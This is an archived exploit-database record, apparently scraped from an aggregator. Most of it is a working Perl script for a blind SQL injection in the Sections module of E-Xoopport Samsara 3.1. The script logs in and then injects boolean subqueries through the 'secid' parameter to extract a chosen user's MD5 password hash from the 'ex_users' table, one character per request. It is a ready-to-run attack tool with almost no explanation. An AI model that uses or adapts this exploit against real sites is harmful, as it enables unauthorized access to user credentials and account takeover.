E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection

2010-09-14T00:00:00

Description

{"id": "EDB-ID:15004", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection", "description": "", "published": "2010-09-14T00:00:00", "modified": "2010-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/15004", "reporter": "_mRkZ_", "references": [], "cvelist": ["2010-3467"], "immutableFields": [], "lastseen": "2022-08-16T09:15:19", "viewCount": 10, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661182887, "score": 1661184847, "epss": 1678791570}, "_internal": {"score_hash": "6d229844504243dd4fed86aef31fc297"}, "sourceHref": "https://www.exploit-db.com/download/15004", "sourceData": "#!/usr/bin/perl\r\n# [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit\r\n# Author/s: _mRkZ_ & Dante90, WaRWolFz Crew\r\n# Created: 2010.09.12 after 0 days the bug was discovered.\r\n# Web Site: www.warwolfz.org\r\n\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\nuse HTTP::Request::Common;\r\n\r\n$^O eq 'MSWin32' ? system('cls') : system('clear');\r\n\r\nprint \"\r\nE-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit\r\n+---------------------------------------------------+\r\n| Script: E-Xoopport |\r\n| Affected versions: 3.1 |\r\n| Bug: Remote Blind SQL Injection (Sections Module) |\r\n| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew |\r\n| Web Site: www.warwolfz.org |\r\n+---------------------------------------------------+\r\n\";\r\n\r\nif (@ARGV != 4) {\r\n\tprint \"\\r\\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\\r\\n\";\r\n\texit;\r\n}\r\n\r\n$host = $ARGV[0];\r\n$usr = $ARGV[1];\r\n$pwd = $ARGV[2];\r\n$anickde = $ARGV[3];\r\n$anick = '0x'.EncHex($anickde);\r\n\r\nprint \"[+] Logging In...\\r\\n\";\r\nmy %postdata = (\r\n\tuname => \"$usr\",\r\n\tpass => \"$pwd\"\r\n);\r\n$ua = LWP::UserAgent->new;\r\n$ua->agent(\"Mozilla 5.0\");\r\nmy $req\t\t= (POST $host, \\%postdata);\r\nmy $cookies = HTTP::Cookies->new();\r\n$request\t= $ua->request($req);\r\n$ua->cookie_jar($cookies);\r\n$content\t= $request->content;\r\nif ($content =~ /<head><meta http-equiv=\"Refresh\" content=\"0; URL=modules\\/news\\/\" \\/><\\/head>/i) {\r\n\tprint \"[+] Logged in\\r\\n\";\r\n} else {\r\n\tprint \"[-] Fatal Error: username/password incorrect?\\r\\n\";\r\n\texit;\r\n}\r\n\r\nprint \"[!] Retriving section id...\\r\\n\";\r\n$idi = 0;\r\nwhile ($idi != 11) {\r\n\t$idi++;\r\n\t$ua = LWP::UserAgent->new;\r\n\t$ua->agent(\"Mozilla 5.0\");\r\n\tmy $req\t\t= $host.\"/modules/sections/index.php?op=listarticles&secid=$idi\";\r\n\t$request\t= $ua->get($req);\r\n\t$ua->cookie_jar($cookies);\r\n\t$content\t= $request->content;\r\n\tif ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\\/b>/ig) {\r\n\t\t$secid = $idi;\r\n\t\tlast;\r\n\t}\r\n}\r\n\r\nif(!defined $secid) {\r\n\tprint \"[-] Fatal Error: Section id not found!\\r\\n\";\r\n\texit;\r\n} else {\r\n\tprint \"[+] Section id '$secid' retrieved\\r\\n\";\r\n}\r\n\r\nprint \"[!] Checking path...\\r\\n\";\r\n$ua = LWP::UserAgent->new;\r\n$ua->agent(\"Mozilla 5.0\");\r\nmy $req\t\t= $host.\"/modules/sections/index.php?op=listarticles&secid=$secid\";\r\n$request\t= $ua->get($req);\r\n$ua->cookie_jar($cookies);\r\n$content\t= $request->content;\r\nif ($content =~ /Ecco i documenti della sezione/i) {\r\n\tprint \"[+] Correct Path\\r\\n\";\r\n} else {\r\n\tprint \"[-] Fatal Error: Wrong Path\\r\\n\";\r\n\texit;\r\n}\r\n\r\nprint \"[!] Checking if vulnerability has been fixed...\\r\\n\";\r\n$ua = LWP::UserAgent->new;\r\n$ua->agent(\"Mozilla 5.0\");\r\nmy $req\t\t= $host.\"/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1\";\r\n$request\t= $ua->get($req);\r\n$ua->cookie_jar($cookies);\r\n$content\t= $request->content;\r\nif ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\\/b>/ig) {\r\n\tprint \"[+] Vulnerability has not been fixed...\\r\\n\";\r\n} else {\r\n\tprint \"[-] Fatal Error: Vulnerability has been fixed\\r\\n\";\r\n\topen LOGG, \">log.html\";\r\n\tprint LOGG $content;\r\n\tclose LOGG;\r\n\texit;\r\n}\r\n\r\nprint \"[!] Checking nick to hack...\\r\\n\";\r\n$ua = LWP::UserAgent->new;\r\n$ua->agent(\"Mozilla 5.0\");\r\nmy $req\t\t= $host.\"/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0\";\r\n$request\t= $ua->get($req);\r\n$ua->cookie_jar($cookies);\r\n$content\t= $request->content;\r\nif ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\\/b>/ig) {\r\n\tprint \"[+] Nick exists...\\r\\n\";\r\n} else {\r\n\tprint \"[-] Fatal Error: Nick does not exists\\r\\n\";\r\n\texit;\r\n}\r\n\r\nprint \"[!] Exploiting...\\r\\n\";\r\nmy $i = 1;\r\nwhile ($i != 33) {\r\n\tmy $wn\t= 47;\r\n\twhile (1) {\r\n\t\t$wn++;\r\n\t\t$ua = LWP::UserAgent->new;\r\n\t\t$ua->agent(\"Mozilla 5.0\");\r\n\t\tmy $req\t\t= $host.\"/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn\";\r\n\t\t$request\t= $ua->get($req);\r\n\t\t$ua->cookie_jar($cookies);\r\n\t\t$content\t= $request->content;\r\n\t\tif ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\\/b>/ig) {\r\n\t\t\t$pwdchr .= chr($wn);\r\n\t\t\t$^O eq 'MSWin32' ? system('cls') : system('clear');\r\n\t\t\tPrintChars($anickde, $pwdchr, $secid);\r\n\t\t\tlast;\r\n\t\t}\r\n\t}\r\n\t$i++;\r\n}\r\n\r\nprint \"\\r\\n[+] Exploiting completed!\\r\\n\\r\\n\";\r\nprint \"Visit: www.warwolfz.net\\r\\n\\r\\n\";\r\n\r\nsub PrintChars {\r\n$anick1 = $_[0];\r\n$chars = $_[1];\r\n$secid = $_[2];\r\nprint \"\r\nE-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit\r\n+---------------------------------------------------+\r\n| Script: E-Xoopport |\r\n| Affected versions: 3.1 |\r\n| Bug: Remote Blind SQL Injection (Sections Module) |\r\n| Author/s: _mRkZ_ & Dante90, WaRWolFz Crew |\r\n| Web Site: www.warwolfz.org |\r\n+---------------------------------------------------+\r\n[+] Logging In...\r\n[+] Logged in\r\n[!] Retriving section id...\r\n[+] Section id '$secid' retrived\r\n[!] Checking path...\r\n[+] Correct Path\r\n[!] Checking if vulnerability has been fixed...\r\n[+] Vulnerability has not been fixed...\r\n[!] Checking nick to hack...\r\n[+] Nick exists...\r\n[!] Exploiting...\r\n[+] \".$anick1.\"'s md5 Password: $chars\r\n\";\r\n}\r\n\r\nsub EncHex {\r\n\t$char = $_[0];\r\n\tchomp $char;\r\n\t@trans = unpack(\"H*\", \"$char\");\r\n\treturn $trans[0];\r\n}", "osvdbidlist": ["68083"], "exploitType": "webapps", "verified": true}